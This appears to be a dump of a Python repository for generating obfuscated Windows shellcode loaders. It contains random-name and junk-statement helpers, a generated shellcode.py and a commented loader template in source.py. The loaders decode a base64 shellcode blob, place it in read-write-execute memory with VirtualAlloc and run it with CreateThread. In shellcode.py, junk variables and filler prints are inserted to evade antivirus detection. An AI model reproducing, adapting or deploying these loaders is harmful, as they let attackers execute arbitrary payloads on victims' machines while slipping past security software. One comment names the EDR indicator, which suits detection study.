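    def auto_random_str(self, has_num=True):
        """
        Return one random character.

        :param has_num: when true the character is drawn from a-z and 0-9,
            otherwise from a-z only
        :return: a one-character string
        """
        letters = 'abcdefghijklmnopqrstuvwxyz'
        pool = letters + '0123456789' if has_num else letters
        return pool[self.auto_random_int(min_int=0, max_int=len(pool) - 1)]

    def auto_random_word(self, min_length=3, max_length=10, first_str_no_num=False, all_str_no_num=False):
        """
        Return a random word of lowercase letters and digits.

        :param min_length: shortest word length
        :param max_length: longest word length
        :param first_str_no_num: when true the first character is always a letter
        :param all_str_no_num: when true no character is a digit (takes
            precedence over first_str_no_num)
        :return: the word

        Note: with first_str_no_num set and min_length <= 1 the result is the
        single leading letter; max_length is not consulted in that case.
        """
        if all_str_no_num:
            # Letters only.
            count = self.auto_random_int(min_int=min_length, max_int=max_length)
            return ''.join(self.auto_random_str(has_num=False) for _ in range(count))

        if not first_str_no_num:
            # Any position, including the first, may hold a digit.
            count = self.auto_random_int(min_int=min_length, max_int=max_length)
            return ''.join(self.auto_random_str() for _ in range(count))

        # Leading letter first, then the remaining characters from the full pool.
        word = self.auto_random_str(has_num=False)
        if min_length > 1:
            count = self.auto_random_int(min_int=min_length - 1, max_int=max_length - 1)
            word += ''.join(self.auto_random_str() for _ in range(count))
        return word

    def auto_random_sleep(self, max_int, min_int=0):
        """
        Sleep for a random whole number of seconds.

        :param max_int: longest sleep in seconds
        :param min_int: shortest sleep in seconds
        :return: None
        """
        # min_int used to be accepted but ignored (the range was always
        # 0..max_int). The bounds are ordered first so that a caller passing
        # them the other way round still gets a valid range.
        shortest, longest = sorted((min_int, max_int))
        time.sleep(self.auto_random_int(max_int=longest, min_int=shortest))

    def auto_random_void_command(self, max_str=1000, min_str=500, max_int=3, min_int=1):
        """
        Return one randomly chosen filler statement as source text.

        Seven candidates are built on every call and one is picked: a print
        of a random word, a time.sleep of a random number of seconds, four
        assignments of the form ``word = a OP b`` (OP is +, -, * or /, with
        integers up to 99999999), and one assignment concatenating two random
        words as string literals. The statement shapes are fixed; only the
        identifiers, string contents and numbers vary.

        :param max_str: longest random word length
        :param min_str: shortest random word length
        :param max_int: largest sleep value
        :param min_int: smallest sleep value
        :return: the chosen statement
        """
        random_word = self.auto_random_word(
            min_length=min_str, max_length=max_str, first_str_no_num=True)
        random_int = self.auto_random_int(max_int=max_int, min_int=min_int)
        void_command = [
            'print("tag")'.replace('tag', random_word),
            'time.sleep(tag)'.replace('tag', str(random_int)),
            'tag1 = tag2 + tag3'.replace('tag1', random_word)
            .replace('tag2', str(self.auto_random_int(99999999)))
            .replace('tag3', str(self.auto_random_int(99999999))),
            'tag1 = tag2 - tag3'.replace('tag1', random_word)
            .replace('tag2', str(self.auto_random_int(99999999)))
            .replace('tag3', str(self.auto_random_int(99999999))),
            'tag1 = tag2 * tag3'.replace('tag1', random_word)
            .replace('tag2', str(self.auto_random_int(99999999)))
            .replace('tag3', str(self.auto_random_int(99999999))),
            'tag1 = tag2 / tag3'.replace('tag1', random_word)
            .replace('tag2', str(self.auto_random_int(99999999)))
            .replace('tag3', str(self.auto_random_int(99999999))),
            'tag1 = "tag2" + "tag3"'.replace('tag1', random_word)
            .replace('tag2', self.auto_random_word(
                min_length=min_str, max_length=max_str, first_str_no_num=True))
            .replace('tag3', self.auto_random_word(
                min_length=min_str, max_length=max_str, first_str_no_num=True)),
        ]
        return void_command[self.auto_random_int(min_int=0, max_int=len(void_command) - 1)]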
180 |
--------------------------------------------------------------------------------
/modle/autor.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/5 16:01
4 | # @Author : ordar
5 | # @File : autor.py
6 | # @Project : autoer
7 | # @Python : 3.7.5
8 | from modle.auto_random import AUTO_RANDOM
9 |
10 |
class AUTOR:
    """
    Single access point for the helper plugins: instantiate this one class
    and reach every plugin's methods through its attributes.
    """

    def __init__(self):
        # The random-value helpers are exposed as `.random`.
        self.random = AUTO_RANDOM()
17 |
18 |
--------------------------------------------------------------------------------
/shellcode.py:
--------------------------------------------------------------------------------
1 |
2 | import ctypes,base64,time
3 |
4 | bzhve4ir3k5hi51ct5ceg9zbbyg5qnrekftqimv5f6woe7dejcy69cy6lwkw0efvrnflq66yyfk46cf0025iw3xqy8qd2i4ds6lojub9q56xj5bw3i3t6jblekocy3dnqqmtcbx0p1y3ye1d631z5eshyyjpx7cpjmhvc3fsfm6k8p3qtnrpz90hq291uf04vzlwzrncbiggp09dh73x4fricyl4np3jb9gjckn9qqbw0fkf9o1hawvdjiafqxbc43c8jw5vz3eoz3ime8ovsy4ex9tgiv8y882w89t4efkvnq384itb23chq11mt0lonzczr1qne4rahd0w5g6x7zaq8bddlvi24sk6llpnjbmyn76awcmmx4irv8e14ou1yc60mlq0x76x62np5qyhu0gv5y2ouz9ym20tkp262ci1y9gdcijcuyovl6ldddw49w2b4wacses7oprhero0f8uhbjktcthlsaw11ay9ux9zn1wttc9v0rys4o5b80bq98tahd4gd9uoni14437g16kd9320kob5rbtmo4go06fxyconwbejhc6hw4yx4hzky5vejevyjpz3put2fzb4q1bokc6oa8vl22so9c989wkd64lw2p2cv6diz5izamomqdwbtzc85fi9u0y3vvujbmvb5ohzqlcm1szqpfaff = 7074841 - 24047293
5 |
6 | gnkm5nlru5 = base64.b64decode('/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=')
7 |
8 | time.sleep(1)
9 |
10 | gnkm5nlru5 = bytearray(gnkm5nlru5)
11 |
12 | time.sleep(2)
13 |
14 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
15 |
16 | g7z6o7s5i93jkst0eacs18fp2ts1mfusghtb44mrheha7nj8kror3kvgmfhfhqiayh3tf94dklz70fo8s8ow80o2zfiw3cgra8wyua5ddxvtmytndwemkzgghbno3lkta0j0rzlbxgntzp96td2cjai49fzk6svv2jtrhuu67av7jgs4iq8zpforz235q2hdeyamdu9kh99f0uh2xzm6xvhxikewis4g9vvj1a23fkvcjprziiaxf1l1c6i079nrzob7l3kk99keil8bwzq11oslohu03gijmo8kyh5h1wk8ltfjsnwrh97kzo8d9em110q68iu9wed9sz8sk4nhm45ujp0chlkdmv2kc8rru5rncg56bfjhqo4ocidk9ww1fg7uwnbmtknhk3yn58701a7jvxy93ezifpidy5izg74eoi9fwjpxkbw6dwl62wotgtd6rszdff5kw4suyel6kbs64qpzhtl99z5kk6ug4wb5kq93ixgq85bkpr9ebrivhoevyx4uve92iay3e1rhrbfqft0 = "tz5jbl9zje20dhlb1bh1afx57xuvm32jhftcqery4v8xbhpl8fvoqaldueb7jgmuypl8hniw804ct5ifhoy9ezl9v5wfwc3y75uqq543trpcqwmf5prjq7ibl23t2rsxvb3z3k17alr5wslec3t22rsocsjfccyzvw6ct86mgvjl8wwridkhjni7wiziuyxollh30z6ybxc0sunf35v4mov3z17vto5fbn4vqjtdx3d1wy1yw58g4psdey50qj9xd3ag8xplltvkzvskm39f656sl39lavdejtwlppqmppt73ywmk9amhaeuojc132uplqqotu5d6q6ngbez6drpvf59652x0za633lmw5kjehaqoem9aimz6nr1t74m7gimk75htze2p54lmxft939u7ay5lhpswezr3ritxb4zfoceikdayaltvje7hgjqevjdvengu8wj8f7l9gj0sxjxhvde9eribkj86iyhju6a5gi0n653ym6ysq6nuurvxl48rbwso4" + "hezo6ue4buod8mg7xip5p9ask078v11ck39rz6o47q2wo6bxrhnj8n934u0ai0l2amuy5sirtjnv0vvt9ta6ejh1xjumdbkk5mekizw4krbluyrorddabtlecgkry8f0aovlgfebrl3uittlykdp1r7voweoo1i9br1wwrxsgltpzpcruscuziewf6z0pjhk4smzfk7062puyl5tpqgn8h8nu0uux0glf5jh4ssk8ksudrwmt8gj98wazo19dqfkzj9420oof1yviymffpf5ajtyisflyd9o7itp5bm3vk3o8sg6ruvd9ngtkg00x9s4nayaxlctqmedk908re2ofcs63vrs5z4smsa6hsk9m8fh4h81a87zk0bmk9qocq2aa4shryou6q5rg48w6xditr25kg8oo0vv3hht2sfpa8g370tmgh4a8vzqc5pad6226172a7q8c6ga736yr28pb3us1e9jhn4djuauu6zx6wuvyi6krdj0e16oz84ktx6e0e71n6z3wfp51nmz4sqxylcl0wu7vn6jq3mueb9ln8yvpgaghekorqrjwdu585ny2pz0s158eeajhkqo5gzcsvsseyd4uma4jvmhndu8uou4fmuhx3w6tymo5rxrjnn3"
17 |
18 | a5433x = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(gnkm5nlru5)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
19 |
20 | print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
21 |
22 | cw4kx3tg = (ctypes.c_char * len(gnkm5nlru5)).from_buffer(gnkm5nlru5)
23 |
24 | print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
25 |
26 | ctypes.windll.kernel32.RtlMoveMemory(
27 | ctypes.c_uint64(a5433x),
28 | cw4kx3tg,
29 | ctypes.c_int(len(gnkm5nlru5))
30 | )
31 |
32 | print("ixfxd1r99zugybi3az4k7fl7mf1pqj04hjcma5zncv9jiidv4cv9icfi6wtjcmw329ka01vibeh7dnm378n7s2ihj1owsb68y2qqa8s48scq9zxog9ww0k0syyr8z2ss9n2k1au8vrbkh6ljwo9mn82osz1ap95o85x4zddfswfde1sdz50fcen5d0x1ar9aj762f1qyf1p937eg0e5qm1p4dzj7ysqpnrfrruwx6wnneoh1xxqjkv4vnr13gwe8clinifsg7acqwi9pjtrirasz4cwr5yi672bnypvvcn9fl60jursr2rptfci7han6s80cmu9ivuy60wj5duwk8gjxtr06r2vvfyvgic2h9nubl5ke4ek8ic7u1kvcrgi6k75p6lqag5cxcn426wqsd7g2xym77nnvwuk2x7m6fom1a177kq10d3syq7pw871nsxvfrg755wf6bqu4fn7eduhej86z91zexawwqu47q0gfk85681fa3vra21pq2dcum676m8fl3ziv52ewbdd4p04p6csggg8n31ecyrbmddaon08f4ci2zf1sti8v6goucz0b9hcxgemxa9q4n2qpedky064s4x90mwdx3xo5tzntekhwpcfj9i53rpozxvx6ddewdrj9gp4dgnahcwutk4r1hfm946xvrkzwr8136jdg2jj16t1l2yrlylvwmn8fwh1h97hi3m7m61vcyzpoifcuz24wyedr7hb2defvl0veezlxojjapp09rcz9o2iw4enz1hs2wc0om30x70zcl04kzq19t71ekhgi51jz7tc3garvf2nmy5k3he9q4ckso558gwjxty3k3q795u0e0cdz4nw55k5zkf3x6uuabvlgclbyasr0henuz3kl0dg397zmv1focntl4kc79t0ymmbp078o5srvm1")
33 |
34 | handle = ctypes.windll.kernel32.CreateThread(
35 | ctypes.c_int(0),
36 | ctypes.c_int(0),
37 | ctypes.c_uint64(a5433x),
38 | ctypes.c_int(0),
39 | ctypes.c_int(0),
40 | ctypes.pointer(ctypes.c_int(0))
41 | )
42 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
43 |
--------------------------------------------------------------------------------
/source.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/23 14:55
4 | # @Author : ordar
5 | # @File : source.py
6 | # @Project : HanGuang
7 | # @Python : 3.7.5
8 | import ctypes,base64,time
9 |
10 | # Loader template (Windows only, uses kernel32 through ctypes): decodes an embedded base64 blob, copies it into executable memory and runs it on a new thread in this process.
11 | shellcode = base64.b64decode('flag_to_replace')  # NOTE(review): 'flag_to_replace' looks like a placeholder the generator substitutes; confirm against hanguang.py
12 | # from_buffer() below needs a writable buffer, hence the bytes -> bytearray conversion.
13 | shellcode = bytearray(shellcode)
14 | # Set VirtualAlloc's return type to ctypes.c_uint64 (ctypes assumes a C int return by default, which would truncate a 64-bit address)
15 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
16 | # Allocate len(shellcode) bytes: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
17 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
18 | # Detection note: a private read-write-execute region that is written and then used as a thread start address is a standard indicator for EDR and memory scanners.
19 | # Copy the shellcode into the allocated region
20 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
21 | ctypes.windll.kernel32.RtlMoveMemory(
22 | ctypes.c_uint64(ptr),
23 | buffered,
24 | ctypes.c_int(len(shellcode))
25 | )
26 | # Create a thread that starts executing at the first address of the copied shellcode (a start address not backed by any loaded module image)
27 | handle = ctypes.windll.kernel32.CreateThread(
28 | ctypes.c_int(0),
29 | ctypes.c_int(0),
30 | ctypes.c_uint64(ptr),
31 | ctypes.c_int(0),
32 | ctypes.c_int(0),
33 | ctypes.pointer(ctypes.c_int(0))
34 | )
35 | # Wait for the thread created above to finish; the -1 timeout corresponds to INFINITE
36 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
--------------------------------------------------------------------------------